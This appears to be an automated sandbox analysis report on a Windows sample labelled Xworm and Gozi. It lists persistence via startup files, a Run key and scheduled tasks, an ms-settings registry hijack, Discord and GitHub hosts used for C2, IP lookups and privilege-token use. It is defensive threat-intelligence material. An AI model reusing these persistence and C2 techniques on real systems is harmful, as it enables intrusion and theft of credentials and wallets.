Analysis Overview
SHA256
8ef0aa04db9fe87fe3e9d92103882dde1531a55f8c7fcbceda55f8ae4f501435
Threat Level: Known bad
The file Gk67Vl was found to be: Known bad.
Malicious Activity Summary
Xworm
Gozi
Detect Xworm Payload
Checks computer location settings
Executes dropped EXE
Drops startup file
Reads user/profile data of web browsers
Loads dropped DLL
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Enumerates physical storage devices
Detects Pyinstaller
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of FindShellTrayWindow
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Creates scheduled task(s)
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Checks SCSI registry key(s)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-10 17:38
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-10 17:38
Reported
2024-03-10 17:43
Platform
win10v2004-20240226-en
Max time kernel
237s
Max time network
236s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Gozi
Xworm
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\WinRAR.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Win (3).exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Win (3).exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Win (3).exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pythonw.exe | C:\Users\Admin\AppData\Local\Temp\pythonw.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.lnk | C:\Users\Admin\AppData\Local\Temp\WinRAR.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.lnk | C:\Users\Admin\AppData\Local\Temp\WinRAR.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pythonw.exe | C:\Users\Admin\AppData\Local\Temp\pythonw.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pythonw.exe | C:\Users\Admin\AppData\Local\Temp\pythonw.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update = "C:\\Users\\Admin\\AppData\\Roaming\\Update.exe" | C:\Users\Admin\AppData\Local\Temp\WinRAR.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | checkip.amazonaws.com | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MaxPos1280x720x96(1).x = "4294967295" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).right = "1246" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\SniffedFolderType = "Generic" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\3\NodeSlot = "6" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\3\0\MRUListEx = ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\1\MRUListEx = ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\2 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259} | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616209" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Generic" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\ms-settings\shell\open\command | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\ms-settings\shell\open | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1280x720x96(1).y = "4294967295" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Version = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\MRUListEx = 020000000100000000000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\ms-settings | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\ms-settings\shell\open\command | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\WinRAR.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\WinRAR.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\WinRAR.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\opwotwbz.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\opwotwbz.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
